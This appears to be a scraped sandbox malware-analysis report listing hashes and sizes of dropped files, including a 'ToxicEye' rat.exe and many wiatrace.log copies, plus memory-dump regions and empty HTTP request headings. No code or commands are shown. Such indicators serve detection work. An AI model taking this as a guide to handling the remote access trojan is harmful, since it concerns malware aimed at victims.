773cc0d97c6f1e1fbe448a9105f18a4634f83eaa

SHA256
6cc24ae9d4401cb39a9f365d1f4dfe5878eef6262aeba4137665731c7f9217a8

SHA512
6ebd234e1221a55545ee30e0fddf695d27ef371f7c13670b9ac767ef34d536ca57dbaa3bc48ea5ebaecabd90c82408b68943422f6094f5f900887c8eb940324b

Download Submit
C:\Users\ToxicEye\rat.exe

Filesize
111KB

MD5
e3d580a17a351366392ec9e2af674524

SHA1
354e8f441c2fa510e1b3ecab222280649a7efb9a

SHA256
6e644b385d296b76bb3ba68ff006d6b86de763c8b5792e07053e20e3d8218d75

SHA512
a7e2726a2b28a39f6624f419ab9194b4c8e3d4c117e324c2719b3f944c5262cbc064df8989d34b984d8541767327d18381adf6678e4445dc8a49afe0a0824309

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
6KB

MD5
0b667e08a505aa8656151c3ec626565d

SHA1
5066133aa55aba9bea834695e7a9641d2a1c88da

SHA256
63e3f8f254a2c501a07aeecc9f693ecc1cda7a79f27b84ec132cc925e453ab1e

SHA512
eaac64296a7b778047ff9b5faca09adf36cd7ddedabd3fc48da23bf7ddd00139c1cc65fa24c3cbb41b90f33a4940aa19b9834e1140f84b32bb46227ed3faa4ea

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
9KB

MD5
2f70ed23db9be882542833894ea582ce

SHA1
b65138d26c3fc7e17c35fc234c9e888719806927

SHA256
78fb87af11be461d3ba4bbf702bd1275e946db2f352e5710a98c7e513ede1398

SHA512
7671575479ff90a2d46f0781cf135981e0976e15ec28ef54a3ffa7a92baed15a4e016d6d850055687f429b8efd95792dc8da46e6a93e43ed0250f4f1f1fb5dc7

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
10KB

MD5
5b84a444573a0157fd8d8b2909669ac3

SHA1
6ad43b3a8e0844b8fab74abe2780d4f3286a9e32

SHA256
625ec0176038236c0cb45df6b9c148af377ecbf3e1c862b784e802a5797cf9cb

SHA512
dd995b28b3021798e52e367254aa4fef45a9d7e20f7bb53436b3ba5a86bd1d87d05e1245e28e9a376dc06e4d85fea831da89644d7fb0627d7830bade22005fa7

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
12KB

MD5
9506087ffa4ced6371a71629ecde998d

SHA1
aaab44df6692584339d7e612e2ac433bc870ba77

SHA256
ce1b65da8f7811909436804dc8e38859c90e91afa21ca46aeac77797e947d02c

SHA512
854f715471002c684b397f9569e01f49669cb9f83dccaa0ade0ddd173b3a6a428cc55a119865186fed317965c5aeedbb56ec90160cb97b6490a61fed8e1b19a0

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
13KB

MD5
5123385828e42f9d47457493798bb39a

SHA1
5d46b0ef33a7f815550d3e33ab1ed9a31897fd29

SHA256
c34851fff9c1f8723b370c6ef84b913fd5f349375274f9e743c85a869b48a572

SHA512
834f96a33b959e28b217c2c9af6bef8ab55def6ad558454234fd5a5b2cace69f0f8358deec457dbab5aac10e9f0962ef07ce8d26c01b44b8efdcf1482d87ed2c

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
15KB

MD5
c2064c003e8c2521675b9006e4ec7da0

SHA1
1bdd6318482f0d98bc859110eab040960a823f49

SHA256
6f48e2ecf50177d0eb45b734f5d7293a024b28933f12a448533cef484918fa3b

SHA512
91e85bb0aa9dd2a081dc670b04c165cd036da267cbd94ae6694ce8831748e662404192c43fa728db055e2742147c942c2ef5d83c08ac7733a479b982b68d29de

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
16KB

MD5
c3ca90682e53b2610c9330100aad0d33

SHA1
a361645f27b376b127f729c2b79b62ba46342385

SHA256
ca9a4e9e9dfa15d2ea26f1d7c8e978554ac6de7941652933f3fd3da4b216ada8

SHA512
25f415d43622a8052e628dbc7e458c1485805e172a49199497801755f8715aa447fc99bc8af6c3ab733ec756c92ae7af8b80294f2d6cdc3ec2d7b633a7aedd88

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
19KB

MD5
5401cad9af13b592c0cd400a34aef925

SHA1
154121bbfd75d3f554a0ebb097b0a2a61c86f97a

SHA256
cdd4a77c73779ad889c99671a16872b77486ad8b8465245b4822878a066396ef

SHA512
5ea993c601aded09ee6e9983829a7a8252e29a94a981c0e95bd9ec136b51cb4344632d1d23f04620d3fa743d9495ec925a21d04a61320231cec45afeaf716688

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
21KB

MD5
11dbf2728d0e79631a7ab13aa6f18bd3

SHA1
a5e95e68b2157fecdcf7127739e6b7a3ccff3828

SHA256
c207f3ebbd1a5ef1c750ac3aa0a284c2cb70cd0c2e3f9ba14c35207ff17b469d

SHA512
97bb6adced9fe4272ea53cd56d50816482e939e2f138e52faf72e5a212ea15413bfba4cce5e0a3e7642ac33185debdc1fda3be08068002670ae9479f152953e3

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
22KB

MD5
d024156e67d2dc21b8f435fd8a18e1fb

SHA1
001496847afdec48a97d7e35b24cb54bc7d455b1

SHA256
35db53f9caea35850f00e853e9955689c7bd37c2674572c668eacad77be33b4a

SHA512
e2e7a2fe0e6d61f5edf2d8b1a175b2c6cb9a14e43187363241b264b994c0f9b5e09aca67219d54c9734ee0ef814b897d2191b9f110e77134dd0b9a1b3b3e54ac

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
25KB

MD5
1eca478101491020ec40ec452c948a67

SHA1
76939293c87c1f7069e7c1d293e137a92377ffd0

SHA256
30a6c6a74bda61361b27936f157c8601c373fa117307c05e5d7cb35715bc5f19

SHA512
60b6ad3b1a056fa6d7e894edecccc83444a39c4b86708e524fb5253651801e0bf54b0293edbfb3642b16122e19b3f287955eb290bfd21992989655afc634404a

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
27KB

MD5
0291f0c6712f721e03cd1b98ee447858

SHA1
c62c5048b7867cad4ca073c85b2eeaae8796a11e

SHA256
cf6460ef400fee6e4ecbe8d037be6b35cabd19e4df80eb7696943ed57fddf79a

SHA512
ecf35ff800e86891e36b37ce83a14716899d024bcdbcb35ea28272bf2b8fc8c14d19d4a361e2fbe430b6862b3de026a72b8a23b2b0a5fb2c256a3e7e1f441e1f

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
28KB

MD5
4d5d253a6a8bb3c7557cbc8cf138eee3

SHA1
28e79ebe95812c3335dd19fb5d0719990fd758c8

SHA256
5ea3baf36affae02d241e8a16338aa7fb760c95910a8adc8e914fb66afbbf2b4

SHA512
25e7c3ea3cd997cd6db3d9318d07e15d59d6b9fb4ccbb9a5ebc6ad2ce391e3979bc080f2b81e95ceb228ff7d2d0db6691707cbb6f0e54f9785e816e5703d00a3

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
31KB

MD5
79e5c611487a000e92dd7346c9f1cf95

SHA1
8819400da9fba6d6c273d10f4b8f162e81edc322

SHA256
b4538792635d274f8a4beb2a97131e83cc08245ce0329ceee448c82e327cf3e2

SHA512
d15cd1d47cdee5677d7b1474a817b6810526ae2cdf3e2106d2486a1920bed26b7467199c77613e6d6c71ce1816425642726d2c83d8ad09c8a35a9a9d1678a0f4

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
33KB

MD5
ed2e62b8dc7a134321f5ec3dc8eb3736

SHA1
65762f463af2c368cabdc44ff16579be073191eb

SHA256
3542e6a23c6c1381c48eec95706af51d5aa0fabe33386e3441fb54e582217d07

SHA512
8a82bb5e6a68d29dcc9e304347f68f902db07f6553a775db84cbe53bdad5e3fec97fb5abee2ebf370614f72f7cb206b1ff2abd68bae28ffd97b7aa5e19ba7c37

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
34KB

MD5
19e152dd0c9cc91c840101612fad9711

SHA1
ef00e10f5e8fabcf5fe2f6be83d7ad6ba366d15f

SHA256
edb4e641d3c88dea78e338f03cd6a7b4d910c96961677c162be9a4a8668a7aad

SHA512
d620ad95f4b7a7a1fdd5f9e08232cb8df7255b6b1b07563c3387bc82f0552befd060d07f0e8fb1bb0d91b86ec5596e33d5059f86d34f89703244135f484d36f0

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
36KB

MD5
2bc969b2ba64a03dbb6c41972cd67472

SHA1
0340eafebd68fd29bad919aa125c7c2cbcb73256

SHA256
38ec492b71c801524a5f10a54c4a864f12d83b3a0aa5858c0840a60450208d06

SHA512
b9faf807696f69957afb0be4dd1a94e768a265e0d6ca0b00fda845c577f6c160e339654832e347c646a0a45364b567c00aadca2a4547704da71ce20a434d726e

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
38KB

MD5
3b74c3db7391cc72cb45036e5f194067

SHA1
e138fed10d6e96ac9163d984324d62a7ce1d0ffa

SHA256
b2b172412b4e97565e8b739394abfd58e9eaedf72ddc76aa58db676aa0c5b3d2

SHA512
d93f2db38d424adb837dd462506479aaffacc6ad36a348a3cba847a76378db745f280a814b0f1ab786bea3098bc1080d25e9083822c3504129b2631a25c16b13

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
42KB

MD5
2d8b937404629ce2250ebbf368eda325

SHA1
90d0106cef3a5c148265d7693b8d6cd8f6ef31c1

SHA256
a5cb5b8f2edb449994680a8574b6351d04ad21e462e6c3f0164afc1d30f060b6

SHA512
a0246126ff974ae8a742e962d9ef23cd6f6612389aa7d8e153085274d41f99fb281e438e65f8c9c2e7a649763bd84b664144ff94f6d99a4ea1f5dfe634189c41

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
44KB

MD5
ad644301f9c684c7966829df24def122

SHA1
2518e2d8fc05200d1efd44c52aaf59fcd62f1c85

SHA256
2e256bc9a57646ee216e34378088f58e97684dd887a6556b579c7db136905ca4

SHA512
bb48e4f0c11c9e10d3546836fafd323cbaf09e6a5bccd918400374e0319929613bdac951de8681cc5c2122d74f1f22514ac71cc894b3226a07bd8dd1fd9c6368

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
45KB

MD5
0e5ab24dd4a84a75b0bfd801ac1c9cbf

SHA1
141ce34101a966b1be8c5ce24ec5ba1c3faa4906

SHA256
51bc3db0897bfad918a8820516453b09bbb8424a7859249f5dfb916abfbbd528

SHA512
d75bd58cf22fbfe18f5482799508cc7cd71d24c5e4ccdade1380e1f70e95b82be02c19a73f1f89bea59717efa2f6b324a3efb2b98b8997e7e3f4248b9023a963

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
47KB

MD5
91ae7f978db89d592cf9f3a886a7ba32

SHA1
a286508633f1704449744074ac388cff74e8e20f

SHA256
e336f7487a85166fe35bb203d01b44f55eb5de2355fba0c8d4700042861c59cd

SHA512
65423ddbfc654ac0d04d5ab7c8f84ea1a58e9e4bdcee272bf3dbb561efdc2ff823cf2f8d33e64836f6a154e38791eb7a9825a8af8004a50da1683606a6ee4024

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
48KB

MD5
61d9afea6d93401f84e5e7725901464e

SHA1
e2c18e5034b4851cd85472ea92f957737ed7c5a3

SHA256
44cf822817431b21cc88bf557233de459cba8a2c3bfac45c7855aa88517464d5

SHA512
e7b823b7fa9fafbb3a8beca00e70e13ff49fa329f6d43bf5d87b27ccc05412f4c749281ef9b68462b5b6ca33ef6524d0695df721a7c932e3a2235c18b6120a41

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
51KB

MD5
156039f5b9bbd958a7d77c2ccc58487b

SHA1
99a24fa5a09f1c952d7f2ed95acde30b2e032c1c

SHA256
2319c26489498b3ab8b7c5bf68415d6d19b1612229f1569529b08329f5498df4

SHA512
a68c789aa5cf4c99d940531d628be41da35d6bb99f61eab10e552d06b170da673b5833c0f10bae80e2507dc01e2658386e7ff083e50ff0a6f418a1505582f53d

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
53KB

MD5
5b6fb2268dc3f56f4347cc24c8123e51

SHA1
257b6cd36395e798c1f0fd1035219d49b1d88c7a

SHA256
b92cf86a8274657282e1db7efed52e24194d9e6ca8e1bca6213d64ae6a994c5a

SHA512
1ca4aa80644c4e1a8d4bad354383d88059789764eb120472b26bc9e535686125fd483213b6070e969132668ac3aea606d34f62162d690d74d53953ecba58d813

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
56KB

MD5
bd04eeea95151dbc634d0c3a169c7b49

SHA1
20d1c665fa7dc82b5b5efb176159b7607c85f5f6

SHA256
b50a481592d631e0d051a7d30ce9d04a8a3cf98d1b920ca2a5095cb1a553f6f8

SHA512
5e286ae326eb7d546921cef0ae3991cf162567c26e61cacd043a28ab408d5812bd36cd5c09d707f1fb29e919c0d8e6f3c270238474201a1acd98460bebc9623c

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
57KB

MD5
c9eb93d07dcf5e60273cc7979a4b1f7c

SHA1
40a4b248e6ba1e3c527f675273a828b762c896f7

SHA256
76f11a784dbdf5e38be8539ca6c0a2ff56556477db7bd2e97e29168682489c28

SHA512
d4e58c70a8f52b9c96fafb3dc716c1f6738f3b079891201c95dc856c1b3dca6d4418c7e4ccc0a653a54198f3db738db894c1fbf532928a4f078e9291903efb8c

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
59KB

MD5
da1caa06f007c4fcb593e92740ea34c8

SHA1
c37fdd3985bcb422a74ffe9f306bddddcf8f1357

SHA256
8356dad5a02b304e81ba70938e4aa5bbe3d8e3d01e18cc01da9be667067465a4

SHA512
4d39c3d4a2aeab0cfa312e602ba2baa0b7dc7c325fde2a562f8d63fe07c28dc26c0d0979db998e9f4cfc6766d84aaa7fa713be3e739d1c1d34136c4a4d4e3d0d

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
60KB

MD5
3d4ba92cb7cc11f61606146ff8b3fd7c

SHA1
62ffa104cf00e9a3e73787e706b2b3d231e33521

SHA256
29fb78d92db7b23bd57c7af7136322bd4999fa35b5cabb922faa5ea04548cb57

SHA512
c7dde6f00ed5a8ecad015f9545f77d56a78888fade6b585d1a47c41dd22269079763e4085eb443dda53a5377b3af9ed9048ae62cf49e64d2282d4f3b13052226

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
62KB

MD5
cdd8daf2c379f7795e7eee3d11aa942e

SHA1
aafae11ec03187b7d887e5d2e4029caf20b2ab67

SHA256
72d264fbebd38faa545ace4adfde4acd4b502b37d2b920c9c92dc88901345cb3

SHA512
a3879fc601e5151617badd89c05e2161acd215f4e1c34dbc2283a7a83a6205ea175fe0ec7940975d444f2cb07e1da597c5f88c385d073b247ec45c592bd668ee

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
63KB

MD5
0ac2ed7a3a9ffb551069478fba5e8e9a

SHA1
356c3896a2739a5ca129e04f681d7aeeba87d6c1

SHA256
5c8782d23f59de4ef44fc881d0a12a168f73cb5b8f3410c4a5fb4fb08443ef8b

SHA512
9cd70f170b8112debae7d4566728a64a22b9fb450e657169fb44fd74361b536c9eac28dddb7e4bfaff723d06745d6c44b9474acd9da172ee456e9f12e03dae03

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
65KB

MD5
85342d115f9cc609fa5a44964e84f83b

SHA1
749998a046a4163b7b3fb4638de9cc5ca0025f1f

SHA256
106fcf73d30a94a88ca9e442055c849526fe5ea93258b02da8a71eda2ff6418d

SHA512
123f54ff22caf2cf74a20bc80f667ec7a15b6c43b310692578f2879a9b5174e5c9d87a7712512424353009e2b043b616565a0b4c565834fa8a9ea69fb4a3a917

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
68KB

MD5
ee2fb3b44d4add60e986b9414be083e4

SHA1
ca465863474da8db4dc351895a1c79a6108ae906

SHA256
a7534da6274e3aaccc9c688f5e926c0a32f7459f09589e28fede30eb26ad3340

SHA512
edb0348fd9e28f748a6e38aa469f69257b2a847946a8e23ff9bac05c1cf62e551c79fd1e5c345d5a5eccd7d0eb95f43196024136d8e8c9601f72678cf97d2a89

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
70KB

MD5
dcc5ba316867fd56fb0d23a32e768d20

SHA1
2e0c15a59d65adb8affd00b17d98fd6f208af082

SHA256
8ff2868e8360c0ba2d0c34a6badf735e058462e298ac0d2e01236597813ebca9

SHA512
7a5286ac05d33b297cf980e1a217b6ce7f755b56e9b8915ef402ce630adc14bb9b1c36796d6e9c835c2c696b49a48d106d6f318dbb2da2ad63e030a256f8f374

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
71KB

MD5
b232664c88af0e4838bace25e27a9bde

SHA1
762bb0bbf4bbfd6b0769cc315694cc26900eaa56

SHA256
1644b0af52bd0275c78c66d9cb403d66e6146f253b8382a1d4c3e2b79b1039a4

SHA512
7eba1dc1f2ae6e43b91196db1dc9d1bf5f57d190f4d842582e6a906899a2f0c0eea7f50c6e3cb6b69cc851ff877a07e41fb6e60d7e518ccafdabf8081682babe

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
74KB

MD5
cd0eb0438fe08753b5cf722e8dc27af3

SHA1
298401686d19f7a0ec63d2eb5d619f1767a2c989

SHA256
a8e3143a9903f65cbdc15b149e027001205b431dbc8f96ac49cffba1bd72851b

SHA512
970e231835e23b43d0ed35507ebcf2261e712c648303932b0f621a35b7bfeb97e10d0f2fdc15c918731465e6183b6b1063b68e41062b53bbfef5d09daece32b4

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
4KB

MD5
ba63ca1aa9800fc75893a1b93edf08b4

SHA1
e239d198366d4d608b588bfd850a493c5466c97c

SHA256
6ad8e7121552bcecc0db86a1cc3a89d55b574173fd1be987252002c8f03b32d6

SHA512
94614dc0bd9f3cd8a0afb72ed002b4035f8237113d4f2195be5a0ca5c16742758879a3ac7631771ec59792b60efda03dc5259cfd16b22c79c11505ead0797fff

Download Submit
memory/1576-12-0x000001D6FC760000-0x000001D6FC7D6000-memory.dmp

Filesize
472KB

Download
memory/1576-11-0x000001D6FC630000-0x000001D6FC6DA000-memory.dmp

Filesize
680KB

Download
memory/1576-887-0x000001D6FC5B0000-0x000001D6FC5BA000-memory.dmp

Filesize
40KB

Download
memory/4464-1-0x000002354A630000-0x000002354A652000-memory.dmp

Filesize
136KB

Download
memory/4464-2-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/4464-6-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

Filesize
10.8MB

Download
memory/4464-0-0x00007FFD35BC3000-0x00007FFD35BC5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response